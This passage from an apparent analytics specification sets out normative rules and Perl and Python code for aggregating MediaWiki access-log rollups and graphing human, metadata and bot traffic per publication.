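The tick invariants reduce to a few lines; this sketch clips to the plotted extent, which is one permissible reading of C2-TICK-0:

```python
# Minimal sketch of C2-TICK-0/1: every tick is an exact multiple of the
# step, anchored at x = 0; major_step must divide evenly by minor_step.
import math

def ticks_anchored_at_zero(min_day: float, max_day: float, step: float):
    lo = math.floor(min_day / step)
    hi = math.ceil(max_day / step)
    # tick = k × step, k ∈ ℤ, kept within the plotted extent
    return [k * step for k in range(lo, hi + 1) if min_day <= k * step <= max_day]

major_step, minor_step = 14, 7
assert major_step % minor_step == 0          # C2-TICK-1
print(ticks_anchored_at_zero(-10, 30, major_step))  # [0, 14, 28]
```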

C2.8 Determinism

C2-DET-0 (Reproducibility)
Given identical manifest, rollups, and parameters, the projection SHALL be reproducible.
C2-DET-1 (No Inference)
The projection SHALL NOT infer missing publication dates, missing titles, or modify source data.

End of invariants

Appendix D - page list verify

TO DO: This needs to be revised (or removed)

page_list_verify is used to accumulate page counts over the supplied rollups input period.

MWDUMP: Appendix D — Page List Verification Normatives
Scope: page_list_verify (rollup aggregation → publication-level summaries)

D-1. Input Trust Boundary
page_list_verify SHALL treat rollup TSVs as authoritative inputs and SHALL NOT reclassify actor types or access modes.

D-2. Canonical Title Authority
The authoritative set of corpus titles SHALL be derived from:

a) the corpus manifest, and
b) explicitly uploaded project publications

No heuristic discovery of additional titles is permitted.

D-3. Page-Only Aggregation (MANDATORY)
All ordering, ranking, and primary aggregation SHALL be performed using:

  • page-only human_get_ok

Meta access SHALL NOT influence ordering or ranking.

D-4. Meta Access as Diagnostic Signal
Meta access MAY be displayed and reported, but SHALL be treated as a diagnostic signal, not as readership.

D-5. Title Normalisation
Title normalisation SHALL:

  • replace underscores with spaces
  • collapse whitespace
  • normalise dash variants
  • preserve semantic identity

Normalisation MUST NOT alter namespace semantics.

D-6. Meta Namespace Integrity
Meta access paths (e.g. <root>-meta/…) SHALL NOT be interpreted as page titles. Meta namespace elements SHALL be stripped before title comparison.

D-7. Category Separation
Aggregations SHALL preserve separation between:

  • human
  • AI bot
  • bot
  • badbot

No category may be collapsed into another for convenience.

D-8. Zero-Activity Preservation
Corpus titles with zero activity in the aggregation window SHALL still be included in outputs when completeness is required.

D-9. Sorting Semantics
When sorting by readership, only page-only human_get_ok SHALL be used. Any other sorting key MUST be explicitly declared.

D-10. Presentation Transparency
When displaying per-title summaries, any displayed composite values MUST be explicitly labelled (e.g. page vs meta).

Implicit summation is prohibited.

page_list_verify code


#!/usr/bin/env perl
use strict;
use warnings;
use Getopt::Long qw(GetOptions);
use Archive::Tar;
use URI::Escape qw(uri_unescape);
use File::Spec;

# ============================================================================
# page_list_verify
#
# Manifest-agnostic rollup verifier.
#
# Aggregation key (resource name):
#   1) If MediaWiki title extractable:
#        - normalise per paper rules
#        - use TITLE
#   2) Else:
#        - take LAST PATH COMPONENT (basename)
#        - use as resource name
#
# Output:
#   resource_name <tab> human_get_ok <tab> <all other numeric columns...>
#
# Sorted by: human_get_ok DESC, then resource_name ASC
# ============================================================================

my $ROLLUPS = "";
my $SERVER  = "";       # optional vhost filter
my $X       = "pub";
my $XDIR    = "pub-dir";
my $MDIR    = "pub-meta";
my $HELP    = 0;

GetOptions(
  "rollups=s" => \$ROLLUPS,
  "server=s"  => \$SERVER,
  "x=s"       => \$X,
  "xdir=s"    => \$XDIR,
  "mdir=s"    => \$MDIR,
  "help!"     => \$HELP,
) or die "bad options\n";

if ($HELP || !$ROLLUPS) {
  print <<"USAGE";
Usage:
  $0 --rollups rollups.tgz [--server publications.arising.com.au]
  $0 --rollups /path/to/tsv_dir [--server publications.arising.com.au]

Behavior:
  - Aggregates by resource name
  - Orders by human_get_ok descending
USAGE
  exit 0;
}

my %SUM;
my @PRINT_NUM_COLS;
my $COLS_INIT = 0;

sub looks_numeric {
  my ($v) = @_;
  return defined($v) && $v =~ /^\d+$/;
}

sub normalise_title {
  my ($t) = @_;
  $t = uri_unescape($t // "");
  $t =~ s/_/ /g;
  $t =~ s/[\x{2013}\x{2014}]/-/g;   # – —
  $t =~ s/\s+/ /g;
  $t =~ s/^\s+|\s+$//g;
  return $t;
}

sub last_path_component {
  my ($p) = @_;
  $p //= "";
  $p =~ s/#.*$//;
  $p =~ s/\?.*$//;
  $p =~ s{.*/}{};
  return uri_unescape($p);
}

sub split_path_query {
  my ($raw) = @_;
  $raw //= "";
  my $p = uri_unescape($raw);

  # drop fragment
  $p =~ s/#.*$//;

  # split base and query (no further decoding yet; uri_unescape already done)
  my ($base, $qs) = split(/\?/, $p, 2);
  $qs //= "";

  return ($base, $qs);
}

sub parse_qs {
  my ($qs) = @_;
  my %q;
  return %q if !defined($qs) || $qs eq "";

  for my $pair (split /&/, $qs) {
    next if $pair eq "";
    my ($k, $v) = split /=/, $pair, 2;
    $k //= "";
    $v //= "";
    $k = uri_unescape($k);
    $v = uri_unescape($v);
    $q{lc $k} = $v if $k ne "";
  }
  return %q;
}

sub is_special_target_carrier {
  my ($title) = @_;
  return 0 unless defined $title && $title ne "";

  # Case-insensitive exact match on these Special pages
  my %SPECIAL = map { lc($_) => 1 } qw(
    Special:WhatLinksHere
    Special:RecentChangesLinked
    Special:LinkSearch
    Special:PageInformation
    Special:CiteThisPage
    Special:PermanentLink
  );

  return $SPECIAL{lc $title} ? 1 : 0;
}

sub extract_title_candidate {
  my ($raw) = @_;
  return undef unless defined $raw && $raw ne "";

  my ($base, $qs) = split_path_query($raw);
  my %q = parse_qs($qs);

  # Carrier 1 — Direct page path: /<x>/<title>
  if ($base =~ m{^/\Q$X\E/(.+)$}) {
    my $t = $1;

    # Carrier 3 — Special-page target title (when Special page is accessed via /<x>/Special:...)
    if (is_special_target_carrier($t)) {
      return $q{target}   if defined $q{target}   && $q{target}   ne "";
      return $q{page}     if defined $q{page}     && $q{page}     ne "";
      return $q{title}    if defined $q{title}    && $q{title}    ne "";
      # return $q{returnto} if defined $q{returnto} && $q{returnto} ne ""; # this is caused by a user or a robot trying to access a non-public page
      return $t;  # attribute to the Special page itself
    }

    return $t;
  }

  # Carrier 1b — Paired root folding: /<xdir>/<title>
  if ($base =~ m{^/\Q$XDIR\E/(.+)$}) {
    return $1;
  }

  # Carrier 2 — Canonical index form: /<xdir>/index.php?<query>
  if ($base =~ m{^/\Q$XDIR\E/index\.php$}i) {

    # If title= points at a Special page, handle Special target extraction
    if (defined $q{title} && $q{title} ne "" && is_special_target_carrier($q{title})) {
      return $q{target}   if defined $q{target}   && $q{target}   ne "";
      return $q{page}     if defined $q{page}     && $q{page}     ne "";
      return $q{title}    if defined $q{title}    && $q{title}    ne "";
      # return $q{returnto} if defined $q{returnto} && $q{returnto} ne ""; # access to a non public page
      return $q{title};   # attribute to the Special page itself
    }

    # Normal index.php handling
    return $q{title}    if defined $q{title}    && $q{title}    ne "";
    return $q{page}     if defined $q{page}     && $q{page}     ne "";
    return $q{returnto} if defined $q{returnto} && $q{returnto} ne "";
  }

  # Generic request-parameter title carrier (permissive)
  return $q{title}  if defined $q{title}  && $q{title}  ne "";
  return $q{page}   if defined $q{page}   && $q{page}   ne "";
  return $q{target} if defined $q{target} && $q{target} ne "";

  if ($base =~ m{^/\Q$MDIR\E/(.+)$}) {
     return ".$1"; 
  }

  return undef;
}

sub init_columns {
  my (@cols) = @_;
  my @num = grep { $_ ne "server_name" && $_ ne "path" } @cols;

  if (grep { $_ eq "human_get_ok" } @num) {
    @PRINT_NUM_COLS = ("human_get_ok", grep { $_ ne "human_get_ok" } @num);
  } else {
    warn "WARNING: human_get_ok column missing\n";
    @PRINT_NUM_COLS = @num;
  }
  $COLS_INIT = 1;
}

sub parse_stream {
  my ($fh, $src) = @_;

  my $header = <$fh> // return;
  chomp $header;
  my @cols = split /\t/, $header, -1;
  my %ix;
  $ix{$cols[$_]} = $_ for 0 .. $#cols;

  die "$src: missing server_name\n" unless exists $ix{server_name};
  die "$src: missing path\n"        unless exists $ix{path};

  init_columns(@cols) unless $COLS_INIT;

  while (<$fh>) {
    chomp;
    next if $_ eq "";
    my @f = split /\t/, $_, -1;

    my $srv = $f[$ix{server_name}] // "";
    next if $SERVER ne "" && $srv ne $SERVER;

    my $path = $f[$ix{path}] // "";

    my $key;
    if (my $cand = extract_title_candidate($path)) {
      my $t = normalise_title($cand);
      $key = $t ne "" ? $t : last_path_component($path);
    } else {
      $key = last_path_component($path);
    }

    for my $c (@PRINT_NUM_COLS) {
      my $i = $ix{$c};
      my $v = defined $i ? ($f[$i] // 0) : 0;
      $v = 0 unless looks_numeric($v);
      $SUM{$key}{$c} += $v;
    }
  }
}

sub process_dir {
  my ($d) = @_;
  opendir my $dh, $d or die "cannot open $d\n";
  for my $f (sort grep { /\.tsv$/ } readdir $dh) {
    open my $fh, "<", File::Spec->catfile($d,$f) or die;
    parse_stream($fh, "$d/$f");
    close $fh;
  }
  closedir $dh;
}

sub process_tgz {
  my ($tgz) = @_;
  my $tar = Archive::Tar->new;
  $tar->read($tgz,1) or die "cannot read $tgz\n";
  for my $n (sort $tar->list_files) {
    next unless $n =~ /\.tsv$/;
    open my $fh, "<", \$tar->get_content($n) or die;
    parse_stream($fh, "$tgz:$n");
    close $fh;
  }
}

if (-d $ROLLUPS) {
  process_dir($ROLLUPS);
} else {
  process_tgz($ROLLUPS);
}

# Output
print join("\t", "resource", @PRINT_NUM_COLS), "\n";

for my $k (
  sort {
    ($SUM{$b}{human_get_ok} // 0) <=> ($SUM{$a}{human_get_ok} // 0)
    || $a cmp $b
  } keys %SUM
) {
  print join("\t", $k, map { $SUM{$k}{$_} // 0 } @PRINT_NUM_COLS), "\n";
}

Appendix E - MiB graph

I got tired of the model ignoring invariants. The following code may be used to display MiB per rollup file (one-hour summary).

#!/usr/bin/env python3
"""
Generate MiB/hour time series and graph from rollups only.

Assumptions (matches your rollup format):
- Each rollup file is a 1-hour bucket TSV.
- Filename contains bucket window like:
    YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv
- Each TSV row has a 'total_bytes' column (bytes for that path in that bucket).
- To get total bucket traffic, we SUM total_bytes across all rows in the file.

Outputs:
- time_series_mib_hourly_from_rollups.tsv
- mib_hourly_log_ma3_1000px.png
"""

import argparse
import csv
import os
import re
from datetime import datetime, timezone
from typing import Optional, Tuple, List, Dict

import pandas as pd
import matplotlib.pyplot as plt


FILENAME_RE = re.compile(
    r"^(?P<y1>\d{4})_(?P<m1>\d{2})_(?P<d1>\d{2})T(?P<h1>\d{2})_(?P<min1>\d{2})Z"
    r"-to-"
    r"(?P<y2>\d{4})_(?P<m2>\d{2})_(?P<d2>\d{2})T(?P<h2>\d{2})_(?P<min2>\d{2})Z"
    r"\.tsv$"
)


def parse_bucket_from_filename(fn: str) -> Tuple[datetime, datetime]:
    m = FILENAME_RE.match(fn)
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    g = m.groupdict()
    start = datetime(int(g["y1"]), int(g["m1"]), int(g["d1"]), int(g["h1"]), int(g["min1"]), tzinfo=timezone.utc)
    end   = datetime(int(g["y2"]), int(g["m2"]), int(g["d2"]), int(g["h2"]), int(g["min2"]), tzinfo=timezone.utc)
    return start, end


def read_bucket_total_bytes(path: str, server_filter: Optional[str] = None) -> Tuple[int, Optional[str]]:
    """
    Returns (sum_total_bytes, inferred_server_name_or_None).

    If server_filter is set and 'server_name' column exists, only rows matching are counted.
    """
    total = 0
    inferred_server = None

    with open(path, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        header = next(reader)

        col = {name: i for i, name in enumerate(header)}
        if "total_bytes" not in col:
            raise RuntimeError(f"Missing 'total_bytes' column in {path}")

        idx_total_bytes = col["total_bytes"]
        idx_server = col.get("server_name", None)

        for row in reader:
            if not row:
                continue

            if idx_server is not None and len(row) > idx_server:
                sname = row[idx_server]
                if inferred_server is None and sname:
                    inferred_server = sname

                if server_filter is not None and sname != server_filter:
                    continue
            elif server_filter is not None:
                # asked to filter but file has no server_name col
                continue

            try:
                total += int(row[idx_total_bytes])
            except Exception:
                # treat malformed as zero
                pass

    return total, inferred_server


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--rollups_dir", default="rollups", help="Directory containing hourly rollup TSVs")
    ap.add_argument("--server", default=None, help="Optional server_name filter (exact match)")
    ap.add_argument("--out_tsv", default="time_series_mib_hourly_from_rollups.tsv", help="Output TSV")
    ap.add_argument("--out_png", default="mib_hourly_log_ma3_1000px.png", help="Output PNG graph")
    ap.add_argument("--dpi", type=int, default=100, help="DPI (default: 100)")
    ap.add_argument("--width_px", type=int, default=1000, help="Output width in pixels (default: 1000)")
    ap.add_argument("--height_px", type=int, default=500, help="Output height in pixels (default: 500)")
    args = ap.parse_args()

    files = sorted([f for f in os.listdir(args.rollups_dir) if f.endswith(".tsv")])

    rows: List[Dict] = []
    inferred_server_global = None

    for fn in files:
        try:
            start, end = parse_bucket_from_filename(fn)
        except ValueError:
            # skip non-rollup TSVs that don't match the bucket naming convention
            continue

        fp = os.path.join(args.rollups_dir, fn)
        total_bytes, inferred_server = read_bucket_total_bytes(fp, server_filter=args.server)

        if inferred_server_global is None and inferred_server:
            inferred_server_global = inferred_server

        bucket_seconds = int((end - start).total_seconds())
        mib = total_bytes / (1024.0 * 1024.0)
        mib_per_second = mib / bucket_seconds if bucket_seconds > 0 else 0.0

        rows.append(
            {
                "server_name": args.server if args.server else (inferred_server or inferred_server_global or ""),
                "bucket_start": start.isoformat().replace("+00:00", "Z"),
                "bucket_end": end.isoformat().replace("+00:00", "Z"),
                "bucket_seconds": bucket_seconds,
                "total_bytes": total_bytes,
                "MiB": mib,
                "MiB_per_second": mib_per_second,
            }
        )

    if not rows:
        raise SystemExit("No rollup TSVs matched the expected filename pattern in rollups_dir.")

    df = pd.DataFrame(rows)
    df["bucket_start"] = pd.to_datetime(df["bucket_start"], utc=True)
    df = df.sort_values("bucket_start").reset_index(drop=True)

    # MA(3) across hourly buckets; first 2 points undefined
    df["MA3_MiB"] = df["MiB"].astype(float).rolling(window=3, min_periods=3).mean()

    # Write derived series TSV (audit)
    out_df = df.copy()
    out_df["bucket_start"] = out_df["bucket_start"].dt.strftime("%Y-%m-%dT%H:%M:%SZ")
    out_df.to_csv(args.out_tsv, sep="\t", index=False)

    # Plot at requested pixel size
    fig_w_in = args.width_px / args.dpi
    fig_h_in = args.height_px / args.dpi
    plt.figure(figsize=(fig_w_in, fig_h_in), dpi=args.dpi)

    plt.plot(df["bucket_start"], df["MiB"], label="MiB/hour")
    plt.plot(df["bucket_start"], df["MA3_MiB"], label="MA(3) MiB/hour")

    # Log paper + graticules
    plt.yscale("log")
    plt.grid(True, which="major")
    plt.grid(True, which="minor")

    # X ticks every 7 days, oblique
    start = df["bucket_start"].min().normalize()
    end = df["bucket_start"].max().normalize()
    tick_locs = pd.date_range(start=start, end=end, freq="7D", tz="UTC")
    plt.xticks(tick_locs, rotation=45, ha="right")

    plt.xlabel("Date (UTC)")
    plt.ylabel("MiB per Hourly Bucket (log scale)")
    title = "Hourly Traffic (MiB/hour) with MA(3) Overlay"
    if args.server:
        title += f" — server={args.server}"
    plt.title(title)
    plt.legend()
    plt.tight_layout()

    plt.savefig(args.out_png)
    print(f"Wrote: {args.out_tsv}")
    print(f"Wrote: {args.out_png}")


if __name__ == "__main__":
    main()

Appendix F - Access Lifecycle Graphlets

access.py (code)

Human get_200_304 vs Anon/Metadata access (unattributed agents/bot-nets). Replacement access.py code, working with aggregation by bucket size and a Moving Average specified in days.

#!/usr/bin/env python3

# History:
# 2026-03-09 Ralph - visual dissonance of the last few publications indicated a mistake in the metadata count - fixed it
# 2026-03-02 Ralph - converted to use aggregations based on bin-size and Moving Average based on days across a set of bins
# 2026-02-28 Ralph - converted it to display log10(1 + bytes/second)

import os, re, math, csv
from datetime import datetime, timezone, timedelta
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import Patch
import argparse

# Paths (already extracted)
manifest_path = "corpus/manifest.tsv"
rollups_dir = "rollups"

out_png = "lifecycle.png"
out_svg = "svg-lifecycle.svg"
out_tsv = "tsv-lifecycle.tsv"  # bucket-binned

ap = argparse.ArgumentParser()
ap.add_argument(
    "--ma-days",
    type=float,
    default=7.0,
    help="Moving average window in days (default=7.0)"
)
ap.add_argument(
    "--h-amp",
    type=float,
    default=40.0,
    help="Human Amplification factor (default=40.0)"
)
args = ap.parse_args()

MA_DAYS = float(args.ma_days)
H_AMP = float(args.h_amp)


# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------

RENAME_MAP = {

    # -------------------------------------------------------------
    # First Self-Hosting Epistemic Capture
    # -------------------------------------------------------------
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",

    # -------------------------------------------------------------
    # CM-2 Governing Knowledge
    # -------------------------------------------------------------
    "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration":
        "Cognitive Memoisation (CM-2) Protocol",

    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) Protocol",

    # -------------------------------------------------------------
    # Corpus Map
    # -------------------------------------------------------------
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",

    # -------------------------------------------------------------
    # Plain Language Summary typo
    # -------------------------------------------------------------
    "Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",

    # -------------------------------------------------------------
    # Missing '?' fix
    # -------------------------------------------------------------
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",

    "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering":
        "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering (2026-12-30)",
}


# Required settings per user
LEAD_DAYS = 10
ROW_SPACING = 1.0
ROW_MAX = 0.45
ROW_MARGIN = 0.05

# Explicit publication colours (user requested)
H_COLOR = "#1f77b4"   # blue
M_COLOR = "#F28C28"   # strong orange
BASELINE_COLOR = "#000000"

def parse_zulu(s: str) -> datetime:
    s = str(s).strip()
    if s.endswith("Z"):
        s2 = s[:-1]
        fmt = "%Y-%m-%dT%H:%M"
        if re.match(r".*:\d\d:\d\d$", s2):
            fmt = "%Y-%m-%dT%H:%M:%S"
        return datetime.strptime(s2, fmt).replace(tzinfo=timezone.utc)
    dt = datetime.fromisoformat(s)
    # Enforce UTC if tz is absent (localtime is not permitted here).
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)

def compact_zulu(dt: datetime) -> str:
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%MZ")

def norm_title(s: str) -> str:
    s = str(s).replace("_", " ")
    s = re.sub(r"\s+", " ", s).strip()
    s = s.replace("–", "-").replace("—", "-").replace("−", "-")
    # Apply the governed rename map; fall back to the normalised title.
    return RENAME_MAP.get(s, s)

from urllib.parse import unquote
def bucket_window_from_filename(fn: str) -> tuple[datetime, datetime, int]:
    """Return (bucket_start_utc, bucket_end_utc, bucket_seconds) parsed from rollup filename."""
    m = re.match(
        r"^(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z-to-"
        r"(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z\.tsv$",
        fn,
    )
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    y1, mo1, d1, hh1, mm1, y2, mo2, d2, hh2, mm2 = map(int, m.groups())
    bstart = datetime(y1, mo1, d1, hh1, mm1, tzinfo=timezone.utc)
    bend   = datetime(y2, mo2, d2, hh2, mm2, tzinfo=timezone.utc)
    secs = int((bend - bstart).total_seconds())
    if secs <= 0:
        raise ValueError(f"Non-positive bucket window in filename: {fn}")
    return bstart, bend, secs

def bucket_start_from_filename(fn: str) -> datetime:
    # Back-compat helper: keep older call sites readable.
    return bucket_window_from_filename(fn)[0]



def classify_path_to_title(path: str):
    p = str(path).split("?", 1)[0]
    p = unquote(p)

    if "-meta/" in p:
        kind = "meta"
        if "/pub-meta/" in p:
            rest = p.split("/pub-meta/", 1)[1]
            parts = rest.split("/", 2)
            if len(parts) >= 2:
                title = parts[1]
            else:
                return (None, None)
        else:
            rest = p.split("-meta/", 1)[1]
            parts = rest.split("/", 1)
            title = parts[1] if len(parts) == 2 else parts[0]
        return (kind, norm_title(title))

    if p.startswith("/pub/"):
        title = p[len("/pub/"):]
        return ("page", norm_title(title))

    return (None, None)

# ---- Load manifest ----
man = pd.read_csv(manifest_path, sep="\t", header=None, names=["title","safe_file","pub_date"])
norm_map = {}
pub_dt = {}
for _, r in man.iterrows():
    t = str(r["title"])
    nt = norm_title(t)
    norm_map.setdefault(nt, t)
    try:
        pub_dt[t] = parse_zulu(r["pub_date"])
    except Exception:
        pass

eligible_titles = [t for t in man["title"].tolist() if t in pub_dt]

# ---- Scan rollups and aggregate daily counts ----
rollup_files = sorted([f for f in os.listdir(rollups_dir) if f.endswith(".tsv")])
first_file = os.path.join(rollups_dir, rollup_files[0])
with open(first_file, "r", newline="") as f:
    reader = csv.reader(f, delimiter="\t")
    header = next(reader)
col_index = {c:i for i,c in enumerate(header)}

path_idx = col_index["path"]
human_get_ok_idx = col_index["human_get_ok"]

# Metadata series must come ONLY from the unattributed metadata actor bucket.
# Include all metadata_* columns so throttled / blocked metadata pressure is retained.
meta_cols = [c for c in header if c.startswith("metadata_")]
if not meta_cols:
    raise RuntimeError("No metadata_* columns found in rollup header")
meta_idx = [col_index[c] for c in meta_cols]

H = {}
M = {}

BUCKET_SECONDS = None

min_bucket = None
max_bucket = None

for fn in rollup_files:
    bstart, bend, bsecs = bucket_window_from_filename(fn)
    if BUCKET_SECONDS is None:
        BUCKET_SECONDS = bsecs
    elif BUCKET_SECONDS != bsecs:
        raise ValueError(f"Inconsistent bucket sizes: saw {BUCKET_SECONDS}s then {bsecs}s in {fn}")
    min_bucket = bstart if min_bucket is None else min(min_bucket, bstart)
    max_bucket = bstart if max_bucket is None else max(max_bucket, bstart)

    fp = os.path.join(rollups_dir, fn)
    with open(fp, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        _ = next(reader)
        for row in reader:
            if not row or len(row) <= path_idx:
                continue
            kind, nt = classify_path_to_title(row[path_idx])
            if kind is None or nt is None:
                continue
            if nt not in norm_map:
                continue
            title = norm_map[nt]
            if title not in pub_dt:
                continue

            if kind == "page":
                try:
                    v = int(row[human_get_ok_idx])
                except Exception:
                    v = 0
                if v:
                    H[(bstart, title)] = H.get((bstart, title), 0) + v
            else:
                s = 0
                for idx in meta_idx:
                    try:
                        s += int(row[idx])
                    except Exception:
                        pass
                if s:
                    M[(bstart, title)] = M.get((bstart, title), 0) + s


MA_BUCKETS = int(round((MA_DAYS * 86400.0) / float(BUCKET_SECONDS)))

if MA_BUCKETS < 1:
    MA_BUCKETS = 1
if MA_BUCKETS % 2 == 0:
    MA_BUCKETS += 1  # force odd for centered MA


# Full bucket list (UTC)
if BUCKET_SECONDS is None or min_bucket is None or max_bucket is None:
    raise RuntimeError("No rollup buckets found")

bucket_list = []
dt = min_bucket
while dt <= max_bucket:
    bucket_list.append(dt)
    dt += timedelta(seconds=BUCKET_SECONDS)

# Relative bucket range (bucket index relative to publication bucket)
LEAD_BUCKETS = int((LEAD_DAYS * 86400) // BUCKET_SECONDS)
min_rel = -LEAD_BUCKETS

# Compute max_rel in buckets based on latest observed rollup bucket.
max_rel = max([
    int(((max_bucket - datetime.fromtimestamp((int(pub_dt[t].timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS, tz=timezone.utc)).total_seconds()) // BUCKET_SECONDS)
    for t in eligible_titles
])
rel_range = np.arange(min_rel, max_rel + 1, dtype=int)
x_days = rel_range.astype(float) * BUCKET_SECONDS / 86400.0 

# Build series
H_series = {}
M_series = {}
for t in eligible_titles:
    pdt = pub_dt[t]
    arr_h = np.zeros(len(rel_range), dtype=float)
    arr_m = np.zeros(len(rel_range), dtype=float)
    pub_epoch = int(pdt.timestamp())
    pub_bucket_epoch = (pub_epoch // BUCKET_SECONDS) * BUCKET_SECONDS
    pub_bucket_dt = datetime.fromtimestamp(pub_bucket_epoch, tz=timezone.utc)

    for bdt in bucket_list:
        rel = int(((bdt - pub_bucket_dt).total_seconds()) // BUCKET_SECONDS)
        if rel < min_rel or rel > max_rel:
            continue
        k = rel - min_rel
        arr_h[k] = H.get((bdt, t), 0)
        arr_m[k] = M.get((bdt, t), 0)
    H_series[t] = arr_h
    M_series[t] = arr_m

# Centered MA    
def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    """Centered moving average with zero padding.
    win is in buckets; coerced to odd >= 1 elsewhere.
    """
    if win <= 1:
        return x.astype(float, copy=True)

    if win % 2 == 0:
        win += 1
    k = win // 2

    xp = np.pad(x.astype(float, copy=False), (k, k), mode="constant", constant_values=0.0)
    kernel = np.ones(win, dtype=float) / float(win)
    return np.convolve(xp, kernel, mode="valid")

H_ma = {t: ma_center_zero(H_series[t],MA_BUCKETS) for t in eligible_titles}
M_ma = {t: ma_center_zero(M_series[t],MA_BUCKETS) for t in eligible_titles}

# LOG compression after the MA; apply REQUIRED amplification to human prior to log
H_log = {t: np.log1p(H_AMP * H_ma[t]) for t in eligible_titles}
M_log = {t: np.log1p(M_ma[t]) for t in eligible_titles}

# Global scaling
global_max = 0.0
for t in eligible_titles:
    mx = float(np.nanmax(np.maximum(H_log[t], M_log[t])))
    global_max = max(global_max, mx)
scale = (ROW_MAX / global_max) if global_max > 0 else 0.0

# Order by publication datetime
ordered = sorted(eligible_titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)

if ROW_MAX > (ROW_SPACING / 2.0) - ROW_MARGIN:
    raise RuntimeError("Non-overlap constraint violated with current ROW_SPACING/ROW_MAX.")

ypos = {t: float((N - 1) - i) * ROW_SPACING for i, t in enumerate(ordered)}

def row_label(t: str) -> str:
    h_total = int(np.sum(H_series[t]))
    m_total = int(np.sum(M_series[t]))
    return f"{t} ({compact_zulu(pub_dt[t])}) (h:{h_total}, m:{m_total})"

# Plot (explicit colours)
fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)), dpi=180)

for t in ordered:
    y0 = ypos[t]
    ax.plot(x_days, np.full_like(x_days, y0), lw=0.25, color=BASELINE_COLOR)
    ax.fill_between(x_days, y0, y0 + (H_log[t] * scale), alpha=1.0, color=H_COLOR)
    ax.fill_between(x_days, y0, y0 - (M_log[t] * scale), alpha=1.0, color=M_COLOR)

ax.axvline(0, ls="--", lw=0.8, color=BASELINE_COLOR)

# Daily ticks, because x is now in days
min_day = -LEAD_DAYS
max_day = float((max_rel * BUCKET_SECONDS) / 86400.0)

ax.set_xlim(min_day, max_day)

span = max_day - min_day
if span <= 120:
    minor_step = 7
    major_step = 14
elif span <= 240:
    minor_step = 15
    major_step = 30 
elif span <= 480:
    minor_step = 15
    major_step = 60
else:
    major_step = 10
    minor_step = 5

def ticks_anchored_at_zero(min_day: float, max_day: float, step: float) -> np.ndarray:
    """
    Generate ticks that are exact multiples of `step`
    and anchored at 0, clipped to [min_day, max_day].
    """
    lo = int(math.floor(min_day / step))
    hi = int(math.ceil(max_day / step))
    return (np.arange(lo, hi + 1, dtype=int) * step).astype(float)

major = ticks_anchored_at_zero(min_day, max_day, major_step)
minor = ticks_anchored_at_zero(min_day, max_day, minor_step)

ax.set_xticks(major)
ax.set_xticks(minor, minor=True)

ax.grid(True, which="major", axis="x")
ax.grid(False, which="minor", axis="x")

ax.tick_params(axis="x", which="minor", labelbottom=False)  # never label minors

yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([row_label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title(
    f"Human vs Anon/Metadata Access Lifecycle Graphlets (LOG ln(1+x) + MA({MA_DAYS:g}d centered; MA_BUCKET={MA_BUCKETS});\n"
    f"GLOBAL_MAX_LOG={global_max:.6f}; H_AMP={H_AMP}"
)

ax.legend(
    handles=[
        Patch(facecolor=H_COLOR, edgecolor=H_COLOR, label="human (page-only human_get_ok; MA ln(1+H_AMP·x); up)"),
        Patch(facecolor=M_COLOR, edgecolor=M_COLOR, label="meta (Σ metadata *_get_ok anon/metadata; MA; ln(1+x); down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

# Margin sizing based on y-label extents
fig.canvas.draw()
renderer = fig.canvas.get_renderer()
max_w_px = max(lab.get_window_extent(renderer=renderer).width for lab in ax.get_yticklabels())
fig_w_px = fig.get_size_inches()[0] * fig.dpi
left_frac = min(0.88, max(0.05, (max_w_px + 15) / fig_w_px))
plt.subplots_adjust(left=left_frac, right=0.985, top=0.95, bottom=0.06)
plt.savefig(out_png)
plt.savefig(out_svg)
plt.close()
print(out_png, out_svg)

humanai.py (new)

Human get_200_304 versus attributed AI bots.
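The green series is built by summing the ai_* column family from each rollup row, selected by header prefix rather than by a fixed column list. A minimal sketch of that selection, using a hypothetical rollup fragment (real headers come from rollups/*.tsv):

```python
import csv
import io

# Hypothetical rollup fragment; column names are illustrative only.
tsv = "path\thuman_get_ok\tai_get_ok\tai_get_err\n/pub/Example\t3\t12\t1\n"
reader = csv.reader(io.StringIO(tsv), delimiter="\t")
header = next(reader)

# Select every column whose name starts with "ai_" (case-insensitive).
ai_idx = [i for i, c in enumerate(header) if c.lower().startswith("ai_")]

row = next(reader)
total = sum(int(row[i]) for i in ai_idx)  # 12 + 1 = 13
```

Selecting by prefix means the script keeps working when new ai_* actor buckets are added to the rollup schema.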

#!/usr/bin/env python3

# History
